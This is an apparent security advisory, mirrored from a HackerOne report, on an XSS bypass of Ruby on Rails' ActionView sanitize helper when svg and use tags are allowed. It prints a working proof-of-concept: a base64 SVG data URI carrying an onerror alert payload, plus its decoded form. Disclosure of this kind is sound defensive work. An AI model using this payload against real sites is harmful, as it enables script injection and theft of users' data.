Ruby on Rails: ActionView sanitize helper bypass leading to XSS using SVG tag.

2022-09-0721:38:41

haqpl

hackerone.com

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.001 Low

EPSS

Percentile

18.1%

JSON

In the specific configuration, it was possible to bypass HTML sanitization by using the use tag of the SVG element.

In the index.html.erb:

&lt;%= sanitize "&lt;svg&gt;&lt;use href=\"data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEzMzcnIGhlaWdodD0nMTMzNyc+CjxpbWFnZSBocmVmPSIxIiBvbmVycm9yPSJhbGVydCh3aW5kb3cub3JpZ2luKSIgLz4KPC9zdmc+#x\"/&gt;&lt;/svg&gt;", tags: %w(svg use) %&gt;

use tag allows to embed another base64 encoded SVG containing target XSS payload, base64 after decoding:

&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='1337' height='1337'&gt;
&lt;image href="1" onerror="alert(window.origin)" /&gt;
&lt;/svg&gt;

SVG and use tags had to be allowed either in global configuration config.action_view.sanitized_allowed_tags = ['svg', 'use']
or inline with tags argument of the helper.

Impact

XSS could lead to data theft through the attacker’s ability to manipulate data through their access to the application, and their ability to interact with other users, including performing other malicious attacks, which would appear to originate from a legitimate user. These malicious actions could also result in reputational damage for the business through the impact on customers’ trust.